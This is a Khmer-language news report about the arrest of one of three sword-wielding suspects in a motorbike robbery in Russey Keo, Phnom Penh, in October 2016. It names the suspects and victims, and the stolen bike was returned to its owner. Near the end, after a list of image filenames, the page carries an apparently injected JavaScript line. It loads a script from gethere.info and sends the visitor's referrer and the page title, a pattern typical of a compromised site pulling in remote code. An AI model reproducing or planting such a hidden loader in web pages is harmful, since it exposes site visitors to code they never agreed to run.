Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

សមត្ថកិច្ចខណ្ឌឬស្សីកែវបង្ក្រាបក្រុមចោរកាប់ប្លន់ម៉ូតូបានម្នាក់ក្នុងចំនោមបក្សពួក និងដកហូតម៉ូតូជូនជនរងគ្រោះវិញ

ភ្នំពេញ៖ ជនសង្ស័យម្នាក់ក្នុងចំនោមបក្សពួក ដែលធ្វើសកម្មភាពកាប់ប្លន់យកម៉ូតូម៉ាកZoomer X សេរីឆ្នាំ ២០១៦ ពណ៍ ខៀវលាយ ឈាមជ្រូកពាក់ស្លាកលេខភ្នំពេញ 1FY -0649 ក្នុងទឹកដីទួលសង្កែនោះ ពេលនេះត្រូវសមត្ថកិច្ចខណ្ឌឬស្សីកែវ បង្ក្រាបបានម្នាក់ហើយ  កាលពីវេលាម៉ោង១និង៣០នាទីរំលងអាធ្រាត ឈានចូលថ្ងៃទី១៨ ខែតុលាឆ្នាំ២០១៦ និងដកហូតម៉ូតូជូនជនរងគ្រោះវិញផងដែរ។

ជនសង្ស័យដែលសមត្ថកិច្ចឃាត់ខ្លួននោះមានឈ្មោះជួន វិចិត្រ ហៅ សិដ្ឋ ភេទប្រុស អាយុ២៣ឆ្នាំ ជនជាតិខ្មែរ ចំណែក២នាក់ទៀតសមត្ថកិច្ចកំពុងតាមប្រមាញ់ មានឈ្មោះបុត្រ ភេទប្រុស អាយុប្រហែល២២ឆ្នាំ ជនជាតិខ្មែរ និងឈ្មោះ រ៉ា ភេទប្រុស ប្រហែលអាយុ២១ឆ្នាំ ជនជាតិខ្មែរ។

គួររំលឹកថាជនរងគ្រោះពីរនាក់ត្រូវក្រុមចោរបីនាក់ដេញកាប់ប្លន់យកម៉ូតូបានសំរេច ហើយរងរបួសត្រូវក្បាល ២ដាវសាំម៉ូរៃ និងម្នាក់ទៀតរងរបួសដៃឆ្វេងបន្តិច។ ហេតុការណ៍ដ៍គួរអោយរន្ធត់មួយនេះបានកើតឡើងកាលពីវេលាម៉ោង២រំលងអាធ្រាតចូលថ្ងៃទី១៤ ខែតុលា ឆ្នាំ ២០១៦ ត្រង់ចំនុចម្ដុំផ្សារទំនប់ ផ្លូវលំកែងនិងផ្លូវ៥៩៨ ស្ថិតក្នុងសង្កាត់ទួលសង្កែ ខណ្ឌឫស្សីកែវ។

ជនរងគ្រោះដែលជាម្ចាស់ម៉ូតូមានឈ្មោះ សុីម សុខរុន ភេទប្រុស អាយុ២២ឆ្នាំ មុខរបរផ្សាដែក មានស្រុកកំ ណើតភូមិវត្តស្នោ ឃុំស្រង់ ស្រុកគងពិសី ខេត្តកំពង់ស្ពឺ និងម្នាក់ទៀតមានឈ្មោះ ញឹម រ៉ាក់ ភេទប្រុស អាយុ២៥ឆ្នាំ មុខជាងផ្សារដែក ស្នាក់នៅនិងមានស្រុកកំណើតជាមួយគ្នា។

តាមប្រភពព័ត៌មានពីជនរងគ្រោះបានអោយដឹងថា មុនពេលកើតហេតុជនរងគ្រោះទាំងពីរនាក់ និងមិត្តភក្ដិរបស់គេផ្សេងទៀតសរុបមានគ្នាចំនួន៨នាក់បានផឹកសុីនៅម្ដុំមុខសណ្ឋាគារណាហ្គា ហើយក្រោយមកក៍ជូនមិត្តភក្ដិម្នាក់ឈ្មោះកម រាជ អាយុ២៣ឆ្នាំ មុខរបរជាងកញ្ចក់ មកផ្ទះជួលប្រពន្ធនៅចំនុចម្តុំកើតហេតុ។

ពេលដែលជិះពីកន្លែងផឹកសុីនោះ ជនរងគ្រោះនិងបក្សពួក៦នាក់ទៀតបានជិះម៉ូតូចំនួនបួនគ្រឿងរួមទាំងម៉ូតូ ជនរងគ្រោះផង លុះចូលទៅក្នុងប្លុកផ្ទះជួលមិត្តភក្ដិជនរងគ្រោះនោះ ដោយសារតែម្តុំនោះជាចំនុចស្ងាត់ជ្រងំហើយម៉ូតូជនរងគ្រោះនៅក្រោយគេក៍ស្រាប់តែមានជនសង្ស័យចំនួនបីនាក់ដើរចេញមកពីក្នុងប្លុកផ្ទះជួលនោះហើយបានដកដាវសាំម៉ូរៃ កាប់មកលើជនរងគ្រោះទាំងពីរនាក់ចំនួន២ដាវត្រូវក្បាល និងត្រូវដៃ មិនតែប៉ុណ្ណោះថែមទាំងគប់ដុំថ្មរទៅលើជនរងគ្រោះទៀតផង បណ្ដាលអោយពួកគេម្នាក់រងរបួសក្បាល និងម្នាក់ទៀតរងរបួសដៃខាងឆ្វេងតែមិនធ្ងន់ធ្ងរនោះទេ។  ហើយជនសង្ស័យទាំងនោះបានយកម៉ូតូជនរងគ្រោះ បើករត់គេចខ្លួនដោយសុវត្ថិភាពបាត់ទៅ។

បច្ចុប្បន្ន អធិការដ្ឋានបាននឹងកំពុងកសាងសំណុំរឿង បញ្ជូនជនសង្ស័យទៅសាលាដំបូងរាជធានីភ្នំពេញ អនុវត្តន៍តាមនីតិវិធីច្បាប់ ដោយឡែកជនសង្ស័យដែលជាបក្សពួកគូកនប្រព្រឹត្តសកម្មភាព២នាក់ទៀត សមត្ថកិច្ចយើងកំពុងបន្តការស្រាវជ្រាវតាមចាប់។

img-20161018-wa0168 img-20161018-wa0162 img-20161018-wa0161 img-20161018-wa0160

img-20161018-wa0169

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More